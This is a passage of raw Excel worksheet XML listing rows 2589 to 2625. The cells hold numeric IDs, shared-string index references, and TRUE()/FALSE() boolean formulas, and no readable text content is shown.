      <c r="D2589" t="s">
        <v>3039</v>
      </c>
      <c r="E2589" t="s">
        <v>3031</v>
      </c>
      <c r="F2589">
        <v>33</v>
      </c>
      <c r="G2589" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2589" t="s">
        <v>3053</v>
      </c>
      <c r="K2589">
        <v>0</v>
      </c>
      <c r="R2589" t="s">
        <v>115</v>
      </c>
      <c r="S2589" t="s">
        <v>3034</v>
      </c>
      <c r="T2589" t="s">
        <v>7</v>
      </c>
      <c r="U2589" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2590" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2590" s="1">
        <v>18958</v>
      </c>
      <c r="B2590" t="s">
        <v>10</v>
      </c>
      <c r="C2590" t="s">
        <v>57</v>
      </c>
      <c r="D2590" t="s">
        <v>3039</v>
      </c>
      <c r="E2590" t="s">
        <v>3031</v>
      </c>
      <c r="F2590">
        <v>33</v>
      </c>
      <c r="G2590" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2590" t="s">
        <v>3054</v>
      </c>
      <c r="K2590">
        <v>0</v>
      </c>
      <c r="R2590" t="s">
        <v>115</v>
      </c>
      <c r="S2590" t="s">
        <v>3034</v>
      </c>
      <c r="T2590" t="s">
        <v>7</v>
      </c>
      <c r="U2590" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2591" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2591" s="1">
        <v>18959</v>
      </c>
      <c r="B2591" t="s">
        <v>10</v>
      </c>
      <c r="C2591" t="s">
        <v>11</v>
      </c>
      <c r="D2591" t="s">
        <v>3039</v>
      </c>
      <c r="E2591" t="s">
        <v>3031</v>
      </c>
      <c r="F2591">
        <v>33</v>
      </c>
      <c r="G2591" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2591" t="s">
        <v>3055</v>
      </c>
      <c r="K2591">
        <v>0</v>
      </c>
      <c r="R2591" t="s">
        <v>115</v>
      </c>
      <c r="S2591" t="s">
        <v>3034</v>
      </c>
      <c r="T2591" t="s">
        <v>7</v>
      </c>
      <c r="U2591" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2592" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2592" s="1">
        <v>18960</v>
      </c>
      <c r="B2592" t="s">
        <v>10</v>
      </c>
      <c r="C2592" t="s">
        <v>57</v>
      </c>
      <c r="D2592" t="s">
        <v>3039</v>
      </c>
      <c r="E2592" t="s">
        <v>3031</v>
      </c>
      <c r="F2592">
        <v>33</v>
      </c>
      <c r="G2592" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2592" t="s">
        <v>3056</v>
      </c>
      <c r="K2592">
        <v>0</v>
      </c>
      <c r="R2592" t="s">
        <v>115</v>
      </c>
      <c r="S2592" t="s">
        <v>3034</v>
      </c>
      <c r="T2592" t="s">
        <v>7</v>
      </c>
      <c r="U2592" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2593" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2593" s="1">
        <v>18961</v>
      </c>
      <c r="B2593" t="s">
        <v>10</v>
      </c>
      <c r="C2593" t="s">
        <v>11</v>
      </c>
      <c r="D2593" t="s">
        <v>3039</v>
      </c>
      <c r="E2593" t="s">
        <v>3031</v>
      </c>
      <c r="F2593">
        <v>33</v>
      </c>
      <c r="G2593" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2593" t="s">
        <v>3057</v>
      </c>
      <c r="K2593">
        <v>0</v>
      </c>
      <c r="R2593" t="s">
        <v>115</v>
      </c>
      <c r="S2593" t="s">
        <v>3034</v>
      </c>
      <c r="T2593" t="s">
        <v>7</v>
      </c>
      <c r="U2593" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2594" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2594" s="1">
        <v>18962</v>
      </c>
      <c r="B2594" t="s">
        <v>10</v>
      </c>
      <c r="C2594" t="s">
        <v>57</v>
      </c>
      <c r="D2594" t="s">
        <v>3039</v>
      </c>
      <c r="E2594" t="s">
        <v>3031</v>
      </c>
      <c r="F2594">
        <v>33</v>
      </c>
      <c r="G2594" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2594" t="s">
        <v>3058</v>
      </c>
      <c r="K2594">
        <v>0</v>
      </c>
      <c r="R2594" t="s">
        <v>115</v>
      </c>
      <c r="S2594" t="s">
        <v>3034</v>
      </c>
      <c r="T2594" t="s">
        <v>7</v>
      </c>
      <c r="U2594" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2595" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2595" s="1">
        <v>18963</v>
      </c>
      <c r="B2595" t="s">
        <v>10</v>
      </c>
      <c r="C2595" t="s">
        <v>11</v>
      </c>
      <c r="D2595" t="s">
        <v>3039</v>
      </c>
      <c r="E2595" t="s">
        <v>3031</v>
      </c>
      <c r="F2595">
        <v>33</v>
      </c>
      <c r="G2595" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2595" t="s">
        <v>3059</v>
      </c>
      <c r="K2595">
        <v>0</v>
      </c>
      <c r="R2595" t="s">
        <v>115</v>
      </c>
      <c r="S2595" t="s">
        <v>3034</v>
      </c>
      <c r="T2595" t="s">
        <v>7</v>
      </c>
      <c r="U2595" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2596" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2596" s="1">
        <v>18964</v>
      </c>
      <c r="B2596" t="s">
        <v>10</v>
      </c>
      <c r="C2596" t="s">
        <v>57</v>
      </c>
      <c r="D2596" t="s">
        <v>3039</v>
      </c>
      <c r="E2596" t="s">
        <v>3031</v>
      </c>
      <c r="F2596">
        <v>33</v>
      </c>
      <c r="G2596" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2596" t="s">
        <v>3060</v>
      </c>
      <c r="K2596">
        <v>0</v>
      </c>
      <c r="R2596" t="s">
        <v>115</v>
      </c>
      <c r="S2596" t="s">
        <v>3034</v>
      </c>
      <c r="T2596" t="s">
        <v>7</v>
      </c>
      <c r="U2596" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2597" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2597" s="1">
        <v>18965</v>
      </c>
      <c r="B2597" t="s">
        <v>10</v>
      </c>
      <c r="C2597" t="s">
        <v>11</v>
      </c>
      <c r="D2597" t="s">
        <v>3039</v>
      </c>
      <c r="E2597" t="s">
        <v>3031</v>
      </c>
      <c r="F2597">
        <v>33</v>
      </c>
      <c r="G2597" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2597" t="s">
        <v>2786</v>
      </c>
      <c r="K2597">
        <v>0</v>
      </c>
      <c r="R2597" t="s">
        <v>115</v>
      </c>
      <c r="S2597" t="s">
        <v>3034</v>
      </c>
      <c r="T2597" t="s">
        <v>7</v>
      </c>
      <c r="U2597" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2598" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2598" s="1">
        <v>18966</v>
      </c>
      <c r="B2598" t="s">
        <v>10</v>
      </c>
      <c r="C2598" t="s">
        <v>57</v>
      </c>
      <c r="D2598" t="s">
        <v>3039</v>
      </c>
      <c r="E2598" t="s">
        <v>3031</v>
      </c>
      <c r="F2598">
        <v>33</v>
      </c>
      <c r="G2598" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2598" t="s">
        <v>3061</v>
      </c>
      <c r="K2598">
        <v>0</v>
      </c>
      <c r="R2598" t="s">
        <v>115</v>
      </c>
      <c r="S2598" t="s">
        <v>3034</v>
      </c>
      <c r="T2598" t="s">
        <v>7</v>
      </c>
      <c r="U2598" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2599" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2599" s="1">
        <v>18967</v>
      </c>
      <c r="B2599" t="s">
        <v>10</v>
      </c>
      <c r="C2599" t="s">
        <v>11</v>
      </c>
      <c r="D2599" t="s">
        <v>3039</v>
      </c>
      <c r="E2599" t="s">
        <v>3031</v>
      </c>
      <c r="F2599">
        <v>33</v>
      </c>
      <c r="G2599" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2599" t="s">
        <v>3062</v>
      </c>
      <c r="K2599">
        <v>0</v>
      </c>
      <c r="R2599" t="s">
        <v>115</v>
      </c>
      <c r="S2599" t="s">
        <v>3034</v>
      </c>
      <c r="T2599" t="s">
        <v>7</v>
      </c>
      <c r="U2599" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2600" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2600" s="1">
        <v>18968</v>
      </c>
      <c r="B2600" t="s">
        <v>10</v>
      </c>
      <c r="C2600" t="s">
        <v>57</v>
      </c>
      <c r="D2600" t="s">
        <v>3039</v>
      </c>
      <c r="E2600" t="s">
        <v>3031</v>
      </c>
      <c r="F2600">
        <v>33</v>
      </c>
      <c r="G2600" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2600" t="s">
        <v>3063</v>
      </c>
      <c r="K2600">
        <v>0</v>
      </c>
      <c r="R2600" t="s">
        <v>115</v>
      </c>
      <c r="S2600" t="s">
        <v>3034</v>
      </c>
      <c r="T2600" t="s">
        <v>7</v>
      </c>
      <c r="U2600" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2601" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2601" s="1">
        <v>18969</v>
      </c>
      <c r="B2601" t="s">
        <v>10</v>
      </c>
      <c r="C2601" t="s">
        <v>11</v>
      </c>
      <c r="D2601" t="s">
        <v>3039</v>
      </c>
      <c r="E2601" t="s">
        <v>3031</v>
      </c>
      <c r="F2601">
        <v>33</v>
      </c>
      <c r="G2601" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2601" t="s">
        <v>3064</v>
      </c>
      <c r="K2601">
        <v>0</v>
      </c>
      <c r="R2601" t="s">
        <v>115</v>
      </c>
      <c r="S2601" t="s">
        <v>3034</v>
      </c>
      <c r="T2601" t="s">
        <v>7</v>
      </c>
      <c r="U2601" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2602" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2602" s="1">
        <v>18970</v>
      </c>
      <c r="B2602" t="s">
        <v>10</v>
      </c>
      <c r="C2602" t="s">
        <v>57</v>
      </c>
      <c r="D2602" t="s">
        <v>3039</v>
      </c>
      <c r="E2602" t="s">
        <v>3031</v>
      </c>
      <c r="F2602">
        <v>33</v>
      </c>
      <c r="G2602" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2602" t="s">
        <v>3065</v>
      </c>
      <c r="K2602">
        <v>0</v>
      </c>
      <c r="R2602" t="s">
        <v>115</v>
      </c>
      <c r="S2602" t="s">
        <v>3034</v>
      </c>
      <c r="T2602" t="s">
        <v>7</v>
      </c>
      <c r="U2602" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2603" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2603" s="1">
        <v>18971</v>
      </c>
      <c r="B2603" t="s">
        <v>10</v>
      </c>
      <c r="C2603" t="s">
        <v>11</v>
      </c>
      <c r="D2603" t="s">
        <v>3039</v>
      </c>
      <c r="E2603" t="s">
        <v>3031</v>
      </c>
      <c r="F2603">
        <v>33</v>
      </c>
      <c r="G2603" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2603" t="s">
        <v>3066</v>
      </c>
      <c r="K2603">
        <v>0</v>
      </c>
      <c r="R2603" t="s">
        <v>115</v>
      </c>
      <c r="S2603" t="s">
        <v>3034</v>
      </c>
      <c r="T2603" t="s">
        <v>7</v>
      </c>
      <c r="U2603" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2604" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2604" s="1">
        <v>18972</v>
      </c>
      <c r="B2604" t="s">
        <v>10</v>
      </c>
      <c r="C2604" t="s">
        <v>57</v>
      </c>
      <c r="D2604" t="s">
        <v>3039</v>
      </c>
      <c r="E2604" t="s">
        <v>3031</v>
      </c>
      <c r="F2604">
        <v>33</v>
      </c>
      <c r="G2604" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2604" t="s">
        <v>3067</v>
      </c>
      <c r="K2604">
        <v>0</v>
      </c>
      <c r="R2604" t="s">
        <v>115</v>
      </c>
      <c r="S2604" t="s">
        <v>3034</v>
      </c>
      <c r="T2604" t="s">
        <v>7</v>
      </c>
      <c r="U2604" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2605" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2605" s="1">
        <v>18973</v>
      </c>
      <c r="B2605" t="s">
        <v>10</v>
      </c>
      <c r="C2605" t="s">
        <v>11</v>
      </c>
      <c r="D2605" t="s">
        <v>3039</v>
      </c>
      <c r="E2605" t="s">
        <v>3031</v>
      </c>
      <c r="F2605">
        <v>33</v>
      </c>
      <c r="G2605" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2605" t="s">
        <v>3068</v>
      </c>
      <c r="K2605">
        <v>0</v>
      </c>
      <c r="R2605" t="s">
        <v>115</v>
      </c>
      <c r="S2605" t="s">
        <v>3034</v>
      </c>
      <c r="T2605" t="s">
        <v>7</v>
      </c>
      <c r="U2605" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2606" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2606" s="1">
        <v>18974</v>
      </c>
      <c r="B2606" t="s">
        <v>10</v>
      </c>
      <c r="C2606" t="s">
        <v>57</v>
      </c>
      <c r="D2606" t="s">
        <v>3039</v>
      </c>
      <c r="E2606" t="s">
        <v>3031</v>
      </c>
      <c r="F2606">
        <v>33</v>
      </c>
      <c r="G2606" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2606" t="s">
        <v>3069</v>
      </c>
      <c r="K2606">
        <v>0</v>
      </c>
      <c r="R2606" t="s">
        <v>115</v>
      </c>
      <c r="S2606" t="s">
        <v>3034</v>
      </c>
      <c r="T2606" t="s">
        <v>7</v>
      </c>
      <c r="U2606" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2607" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2607" s="1">
        <v>18975</v>
      </c>
      <c r="B2607" t="s">
        <v>10</v>
      </c>
      <c r="C2607" t="s">
        <v>57</v>
      </c>
      <c r="D2607" t="s">
        <v>3039</v>
      </c>
      <c r="E2607" t="s">
        <v>3031</v>
      </c>
      <c r="F2607">
        <v>33</v>
      </c>
      <c r="G2607" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2607" t="s">
        <v>3070</v>
      </c>
      <c r="K2607">
        <v>0</v>
      </c>
      <c r="R2607" t="s">
        <v>115</v>
      </c>
      <c r="S2607" t="s">
        <v>3034</v>
      </c>
      <c r="T2607" t="s">
        <v>7</v>
      </c>
      <c r="U2607" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2608" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2608" s="1">
        <v>18976</v>
      </c>
      <c r="B2608" t="s">
        <v>10</v>
      </c>
      <c r="C2608" t="s">
        <v>11</v>
      </c>
      <c r="D2608" t="s">
        <v>3039</v>
      </c>
      <c r="E2608" t="s">
        <v>3031</v>
      </c>
      <c r="F2608">
        <v>33</v>
      </c>
      <c r="G2608" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2608" t="s">
        <v>3071</v>
      </c>
      <c r="K2608">
        <v>0</v>
      </c>
      <c r="R2608" t="s">
        <v>115</v>
      </c>
      <c r="S2608" t="s">
        <v>3034</v>
      </c>
      <c r="T2608" t="s">
        <v>7</v>
      </c>
      <c r="U2608" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2609" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2609" s="1">
        <v>18977</v>
      </c>
      <c r="B2609" t="s">
        <v>10</v>
      </c>
      <c r="C2609" t="s">
        <v>57</v>
      </c>
      <c r="D2609" t="s">
        <v>3039</v>
      </c>
      <c r="E2609" t="s">
        <v>3031</v>
      </c>
      <c r="F2609">
        <v>33</v>
      </c>
      <c r="G2609" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2609" t="s">
        <v>3072</v>
      </c>
      <c r="K2609">
        <v>0</v>
      </c>
      <c r="R2609" t="s">
        <v>115</v>
      </c>
      <c r="S2609" t="s">
        <v>3034</v>
      </c>
      <c r="T2609" t="s">
        <v>7</v>
      </c>
      <c r="U2609" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2610" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2610" s="1">
        <v>18978</v>
      </c>
      <c r="B2610" t="s">
        <v>10</v>
      </c>
      <c r="C2610" t="s">
        <v>11</v>
      </c>
      <c r="D2610" t="s">
        <v>3039</v>
      </c>
      <c r="E2610" t="s">
        <v>3031</v>
      </c>
      <c r="F2610">
        <v>33</v>
      </c>
      <c r="G2610" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2610" t="s">
        <v>3073</v>
      </c>
      <c r="K2610">
        <v>0</v>
      </c>
      <c r="R2610" t="s">
        <v>115</v>
      </c>
      <c r="S2610" t="s">
        <v>3034</v>
      </c>
      <c r="T2610" t="s">
        <v>7</v>
      </c>
      <c r="U2610" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2611" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2611" s="1">
        <v>18979</v>
      </c>
      <c r="B2611" t="s">
        <v>10</v>
      </c>
      <c r="C2611" t="s">
        <v>57</v>
      </c>
      <c r="D2611" t="s">
        <v>3039</v>
      </c>
      <c r="E2611" t="s">
        <v>3031</v>
      </c>
      <c r="F2611">
        <v>33</v>
      </c>
      <c r="G2611" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2611" t="s">
        <v>3074</v>
      </c>
      <c r="K2611">
        <v>0</v>
      </c>
      <c r="R2611" t="s">
        <v>115</v>
      </c>
      <c r="S2611" t="s">
        <v>3034</v>
      </c>
      <c r="T2611" t="s">
        <v>7</v>
      </c>
      <c r="U2611" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2612" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2612" s="1">
        <v>18980</v>
      </c>
      <c r="B2612" t="s">
        <v>10</v>
      </c>
      <c r="C2612" t="s">
        <v>11</v>
      </c>
      <c r="D2612" t="s">
        <v>3039</v>
      </c>
      <c r="E2612" t="s">
        <v>3031</v>
      </c>
      <c r="F2612">
        <v>33</v>
      </c>
      <c r="G2612" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2612" t="s">
        <v>3075</v>
      </c>
      <c r="K2612">
        <v>0</v>
      </c>
      <c r="R2612" t="s">
        <v>115</v>
      </c>
      <c r="S2612" t="s">
        <v>3034</v>
      </c>
      <c r="T2612" t="s">
        <v>7</v>
      </c>
      <c r="U2612" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2613" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2613" s="1">
        <v>18981</v>
      </c>
      <c r="B2613" t="s">
        <v>10</v>
      </c>
      <c r="C2613" t="s">
        <v>57</v>
      </c>
      <c r="D2613" t="s">
        <v>3039</v>
      </c>
      <c r="E2613" t="s">
        <v>3031</v>
      </c>
      <c r="F2613">
        <v>33</v>
      </c>
      <c r="G2613" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2613" t="s">
        <v>3076</v>
      </c>
      <c r="K2613">
        <v>0</v>
      </c>
      <c r="R2613" t="s">
        <v>115</v>
      </c>
      <c r="S2613" t="s">
        <v>3034</v>
      </c>
      <c r="T2613" t="s">
        <v>7</v>
      </c>
      <c r="U2613" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2614" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2614" s="1">
        <v>18982</v>
      </c>
      <c r="B2614" t="s">
        <v>13</v>
      </c>
      <c r="C2614" t="s">
        <v>14</v>
      </c>
      <c r="D2614" t="s">
        <v>3031</v>
      </c>
      <c r="E2614" t="s">
        <v>3031</v>
      </c>
      <c r="F2614">
        <v>0</v>
      </c>
      <c r="G2614" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2614" t="s">
        <v>3077</v>
      </c>
      <c r="K2614">
        <v>0</v>
      </c>
      <c r="R2614" t="s">
        <v>115</v>
      </c>
      <c r="S2614" t="s">
        <v>3034</v>
      </c>
      <c r="T2614" t="s">
        <v>7</v>
      </c>
      <c r="U2614" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2615" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2615" s="1">
        <v>18983</v>
      </c>
      <c r="B2615" t="s">
        <v>13</v>
      </c>
      <c r="C2615" t="s">
        <v>14</v>
      </c>
      <c r="D2615" t="s">
        <v>3078</v>
      </c>
      <c r="E2615" t="s">
        <v>3079</v>
      </c>
      <c r="F2615">
        <v>202020</v>
      </c>
      <c r="G2615" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2615" t="s">
        <v>3080</v>
      </c>
      <c r="K2615">
        <v>0</v>
      </c>
      <c r="R2615" t="s">
        <v>20</v>
      </c>
      <c r="S2615" t="s">
        <v>3081</v>
      </c>
      <c r="T2615" t="s">
        <v>7</v>
      </c>
      <c r="U2615" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2616" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2616" s="1">
        <v>18984</v>
      </c>
      <c r="B2616" t="s">
        <v>10</v>
      </c>
      <c r="C2616" t="s">
        <v>64</v>
      </c>
      <c r="D2616" t="s">
        <v>3082</v>
      </c>
      <c r="E2616" t="s">
        <v>3079</v>
      </c>
      <c r="F2616">
        <v>201794</v>
      </c>
      <c r="G2616" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2616" t="s">
        <v>3083</v>
      </c>
      <c r="K2616">
        <v>0</v>
      </c>
      <c r="R2616" t="s">
        <v>20</v>
      </c>
      <c r="S2616" t="s">
        <v>3081</v>
      </c>
      <c r="T2616" t="s">
        <v>7</v>
      </c>
      <c r="U2616" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2617" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2617" s="1">
        <v>18985</v>
      </c>
      <c r="B2617" t="s">
        <v>10</v>
      </c>
      <c r="C2617" t="s">
        <v>64</v>
      </c>
      <c r="D2617" t="s">
        <v>3082</v>
      </c>
      <c r="E2617" t="s">
        <v>3079</v>
      </c>
      <c r="F2617">
        <v>201794</v>
      </c>
      <c r="G2617" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2617" t="s">
        <v>3084</v>
      </c>
      <c r="K2617">
        <v>0</v>
      </c>
      <c r="R2617" t="s">
        <v>20</v>
      </c>
      <c r="S2617" t="s">
        <v>3081</v>
      </c>
      <c r="T2617" t="s">
        <v>7</v>
      </c>
      <c r="U2617" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2618" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2618" s="1">
        <v>18986</v>
      </c>
      <c r="B2618" t="s">
        <v>10</v>
      </c>
      <c r="C2618" t="s">
        <v>64</v>
      </c>
      <c r="D2618" t="s">
        <v>3082</v>
      </c>
      <c r="E2618" t="s">
        <v>3079</v>
      </c>
      <c r="F2618">
        <v>201794</v>
      </c>
      <c r="G2618" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2618" t="s">
        <v>3085</v>
      </c>
      <c r="K2618">
        <v>0</v>
      </c>
      <c r="R2618" t="s">
        <v>20</v>
      </c>
      <c r="S2618" t="s">
        <v>3081</v>
      </c>
      <c r="T2618" t="s">
        <v>7</v>
      </c>
      <c r="U2618" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2619" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2619" s="1">
        <v>18987</v>
      </c>
      <c r="B2619" t="s">
        <v>10</v>
      </c>
      <c r="C2619" t="s">
        <v>67</v>
      </c>
      <c r="D2619" t="s">
        <v>3082</v>
      </c>
      <c r="E2619" t="s">
        <v>3079</v>
      </c>
      <c r="F2619">
        <v>201794</v>
      </c>
      <c r="G2619" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2619" t="s">
        <v>3086</v>
      </c>
      <c r="K2619">
        <v>0</v>
      </c>
      <c r="R2619" t="s">
        <v>20</v>
      </c>
      <c r="S2619" t="s">
        <v>3081</v>
      </c>
      <c r="T2619" t="s">
        <v>7</v>
      </c>
      <c r="U2619" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2620" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2620" s="1">
        <v>18988</v>
      </c>
      <c r="B2620" t="s">
        <v>10</v>
      </c>
      <c r="C2620" t="s">
        <v>67</v>
      </c>
      <c r="D2620" t="s">
        <v>3082</v>
      </c>
      <c r="E2620" t="s">
        <v>3079</v>
      </c>
      <c r="F2620">
        <v>201794</v>
      </c>
      <c r="G2620" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2620" t="s">
        <v>3087</v>
      </c>
      <c r="K2620">
        <v>0</v>
      </c>
      <c r="R2620" t="s">
        <v>20</v>
      </c>
      <c r="S2620" t="s">
        <v>3081</v>
      </c>
      <c r="T2620" t="s">
        <v>7</v>
      </c>
      <c r="U2620" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2621" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2621" s="1">
        <v>18989</v>
      </c>
      <c r="B2621" t="s">
        <v>10</v>
      </c>
      <c r="C2621" t="s">
        <v>67</v>
      </c>
      <c r="D2621" t="s">
        <v>3082</v>
      </c>
      <c r="E2621" t="s">
        <v>3079</v>
      </c>
      <c r="F2621">
        <v>201794</v>
      </c>
      <c r="G2621" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2621" t="s">
        <v>3088</v>
      </c>
      <c r="K2621">
        <v>0</v>
      </c>
      <c r="R2621" t="s">
        <v>20</v>
      </c>
      <c r="S2621" t="s">
        <v>3081</v>
      </c>
      <c r="T2621" t="s">
        <v>7</v>
      </c>
      <c r="U2621" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2622" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2622" s="1">
        <v>18990</v>
      </c>
      <c r="B2622" t="s">
        <v>10</v>
      </c>
      <c r="C2622" t="s">
        <v>11</v>
      </c>
      <c r="D2622" t="s">
        <v>3082</v>
      </c>
      <c r="E2622" t="s">
        <v>3079</v>
      </c>
      <c r="F2622">
        <v>201794</v>
      </c>
      <c r="G2622" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2622" t="s">
        <v>3089</v>
      </c>
      <c r="K2622">
        <v>0</v>
      </c>
      <c r="R2622" t="s">
        <v>20</v>
      </c>
      <c r="S2622" t="s">
        <v>3081</v>
      </c>
      <c r="T2622" t="s">
        <v>7</v>
      </c>
      <c r="U2622" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2623" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2623" s="1">
        <v>18991</v>
      </c>
      <c r="B2623" t="s">
        <v>10</v>
      </c>
      <c r="C2623" t="s">
        <v>11</v>
      </c>
      <c r="D2623" t="s">
        <v>3082</v>
      </c>
      <c r="E2623" t="s">
        <v>3079</v>
      </c>
      <c r="F2623">
        <v>201794</v>
      </c>
      <c r="G2623" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2623" t="s">
        <v>3090</v>
      </c>
      <c r="K2623">
        <v>0</v>
      </c>
      <c r="R2623" t="s">
        <v>20</v>
      </c>
      <c r="S2623" t="s">
        <v>3081</v>
      </c>
      <c r="T2623" t="s">
        <v>7</v>
      </c>
      <c r="U2623" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2624" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2624" s="1">
        <v>18992</v>
      </c>
      <c r="B2624" t="s">
        <v>10</v>
      </c>
      <c r="C2624" t="s">
        <v>11</v>
      </c>
      <c r="D2624" t="s">
        <v>3082</v>
      </c>
      <c r="E2624" t="s">
        <v>3079</v>
      </c>
      <c r="F2624">
        <v>201794</v>
      </c>
      <c r="G2624" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2624" t="s">
        <v>3091</v>
      </c>
      <c r="K2624">
        <v>0</v>
      </c>
      <c r="R2624" t="s">
        <v>20</v>
      </c>
      <c r="S2624" t="s">
        <v>3081</v>
      </c>
      <c r="T2624" t="s">
        <v>7</v>
      </c>
      <c r="U2624" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="2625" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2625" s="1">
        <v>18993</v>
      </c>
      <c r="B2625" t="s">
        <v>0</v>
      </c>
      <c r="C2625" t="s">
        <v>22</v>
      </c>
      <c r="D2625" t="s">
        <v>3082</v>
      </c>
      <c r="E2625" t="s">
        <v>3079</v>
      </c>
      <c r="F2625">
        <v>201794</v>
      </c>
      <c r="G2625" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2625" t="s">
        <v>3092</v>
      </c>
      <c r="K2625">
        <v>0</v>
      </c>
      <c r="R2625" t="s">
        <v>20</v>
      </c>
      <c r="S2625" t="s">
        <v>3081</v>
